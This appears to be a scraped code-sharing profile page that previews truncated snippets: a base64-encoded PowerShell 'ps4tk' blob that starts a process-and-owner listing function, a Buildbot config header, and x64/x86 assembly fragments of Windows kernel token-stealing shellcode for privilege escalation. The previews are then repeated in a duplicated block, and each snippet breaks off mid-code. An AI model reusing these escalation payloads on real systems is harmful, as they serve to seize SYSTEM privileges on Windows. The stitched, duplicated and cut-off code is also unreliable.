achilles4828

## ps4tk
ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBQAHIAbwBjAGUAcwBzAEwAaQBzAHQAIAB7AA0ACgAJAFAAUgBPAEMARQBTAFMAIAB7AA0ACgAJAAkAJABQAHIAbwBjAGUAcwBzAEwAaQBzAHQAIAA9ACAAQAAoACkADQAKAA0ACgAJAAkARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIABXAGkAbgAzADIAXwBwAHIAbwBjAGUAcwBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwAgAD0AIAAkAF8ADQAKAAkACQAJACQATwB3AG4AZQByACAAPQAgAEkAbgB2AG8AawBlAC0AQwBpAG0ATQBlAHQAaABvAGQAIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACQAUAByAG8AYwBlAHMAcwAgAC0ATQBlAHQAaABvAGQATgBhAG0AZQAgAEcAZQB0AE8AdwBuAGUAcgAgAHwAIABTAGUAbABlAGMAdAAgAEQAbwBtAGEAaQBuACwAIABVAHMAZQByAA0ACgAJAAkACQANAAoACQAJAAkAJABPAHcAbgBlAHIAUwB0AHIAaQBuAGcAIAA9ACAAIgAiAA0ACgAJAAkACQBpAGYAIAAoAFsAUwB0AHIAaQBuAGcAXQA6ADoASQBzAE4AdQBsAGwATwByAEUAbQBwAHQAeQAoACQATwB3AG4AZQByAC4ARABvAG0AYQBpAG4AKQApACAAewANAAoACQAJAAkACQAkAE8AdwBuAGUAcgBTAHQAcgBpAG4AZwAgAD0AIAAkAE8AdwBuAGUAcgAuAFUAcwBlAHIADQAKAAkACQAJAH0AIABlAGwAcwBlACAAewANAAoACQAJAAkACQAkAE8AdwBuAGUAcgBTAHQAcgBpAG4AZwAgAD0AIAAiACQAKAAkAE8AdwBuAGUAcgAuAEQAbwBtAGEA

## Buildbot
# -*- python -*-
# ex: set filetype=python:
'''
  BUILDBOT Master Config for Chromium, WebkitGTK, and Firefox Builder

'''
from buildbot.plugins import *
from buildbot.changes.gitpoller import GitPoller
from buildbot.plugins import changes

## x64_7_2.asm
[BITS 64]

; Compiled via NASM
; based on http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation

start:
	mov rdx, [gs:KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
	mov r11, [rdx + EPROCESS_OFFSET]  ; nt!_KTHREAD -> APCState -> Process
	mov r12, [r11 + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink
	mov rcx, [r12] ; Follow link into first process

## x64_7_1.asm
.code
PUBLIC get_token
get_token proc

;required register cleaning

; Get pointer to _EPROCESS Structure
xor rax, rax ; Set Zero
mov rax, gs:[rax + KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
mov rax, [rax + EPROCESS_OFFSET]  ; nt!_KTHREAD -> APCState -> Process

## x86_7.asm
.386
.model flat, stdcall
ASSUME FS:NOTHING
.code
PUBLIC get_token
get_token PROC

pushad; Save registers state

; Get pointer to _EPROCESS Structure
	# -- python --
	# ex: set filetype=python:
	'''
	BUILDBOT Master Config for Chromium, WebkitGTK, and Firefox Builder

	'''
	from buildbot.plugins import *
	from buildbot.changes.gitpoller import GitPoller
	from buildbot.plugins import changes
	[BITS 64]

	; Compiled via NASM
	; based on http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation

	start:
	mov rdx, [gs:KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
	mov r11, [rdx + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process
	mov r12, [r11 + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink
	mov rcx, [r12] ; Follow link into first process
	.code
	PUBLIC get_token
	get_token proc

	;required register cleaning

	; Get pointer to _EPROCESS Structure
	xor rax, rax ; Set Zero
	mov rax, gs:[rax + KTHREAD_OFFSET] ; nt!_KPRC -> PrcbData -> CurrentThread
	mov rax, [rax + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process
	.386
	.model flat, stdcall
	ASSUME FS:NOTHING
	.code
	PUBLIC get_token
	get_token PROC

	pushad; Save registers state

	; Get pointer to _EPROCESS Structure